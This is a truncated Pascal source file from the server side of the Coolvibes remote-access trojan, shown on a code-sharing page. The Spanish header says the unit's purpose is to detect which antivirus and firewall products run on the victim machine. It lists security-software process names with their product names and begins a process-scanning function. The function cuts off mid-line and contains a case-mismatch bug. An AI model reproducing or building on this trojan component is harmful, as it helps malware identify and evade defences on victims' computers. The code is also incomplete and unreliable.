📄 unitavs.pas
字号:
{Unit perteneciente al server del troyano Coolvibes que contiene funciones para
detectar que antivirus y firewall se usa en el sistema}
unit unitAvs;
interface
uses
Windows,
sysutils,
TLHelp32;
const
Procesos: array[0..15] of String = ('avesvc.exe',
'ashdisp.exe',
'avgcc.exe',
'bdss.exe',
'spider.exe',
'avp.exe',
'nod32krn.exe',
'cclaw.exe',
'dvpapi.exe',
'ewidoctrl.exe',
'mcshield.exe',
'pavfires.exe',
'almon.exe',
'ccapp.exe',
'pccntmon.exe',
'fssm32.exe');
NombreDeAntivirus: array[0..15] of String =('AntiVir',
'Avast Antivirus',
'AVG Antivirus',
'BitDefender',
'Dr.Web',
'Kaspersky Antivirus',
'Nod32',
'Norman',
'Authentium Antivirus',
'Ewido Security Suite',
'McAfee VirusScan',
'Panda Antivirus/Firewall',
'Sophos',
'Symantec/Norton',
'PC-cillin Antivirus',
'F-Secure');
Firewalls: array[0..14] of String = ('issvc.exe',
'vsmon.exe',
'cpf.exe',
'ca.exe',
'tnbutil.exe',
'avp.exe',
'mpfservice.exe',
'npfmsg.exe',
'outpost.exe',
'tpsrv.exe',
'pavfires.exe',
'kpf4ss.exe',
'persfw.exe',
'vsserv.exe',
'smc.exe');
NombreDeFirewall: array[0..14] Of string =('Norton Personal Firewall',
'ZoneAlarm',
'Comodo Firewall',
'eTrust EZ Firewall',
'F-Secure Internet Security',
'Kaspersky Antihacker',
'McAfee Personal Firewall',
'Norman Personal Firewall',
'Outpost Personal Firewall',
'Panda Internet Seciruty Suite',
'Panda Anti-Virus/Firewall',
'Kerio Personal Firewall',
'Tiny Personal Firewall',
'BitDefender / Bull Guard Antivirus',
'Sygate Personal Firewall');
function ObtenerAvs(): String;
function ObtenerFirewall(): String;
implementation
Function Scan(tipo: integer): String;
var
cLoop :Boolean;
CapProcesos:THandle;
L :TProcessEntry32;
i :integer;
Begin
Result := 'NO';
CapProcesos := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS or TH32CS_SNAPMODULE, 0);
L.dwSize := SizeOf(L);
cLoop := Process32First(CapProcesos, L);
while cLoop do
begin
if tipo = 1 then
for i := 0 to 15 do
if LowerCase(L.szExeFile) = Procesos[i] then
begin
If Result = 'No' then //Osea que no ha copiado nada a result
Result := NombreDeAntivirus[i]
else //si es diferente de 'No encontrado' es porque ya copi⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -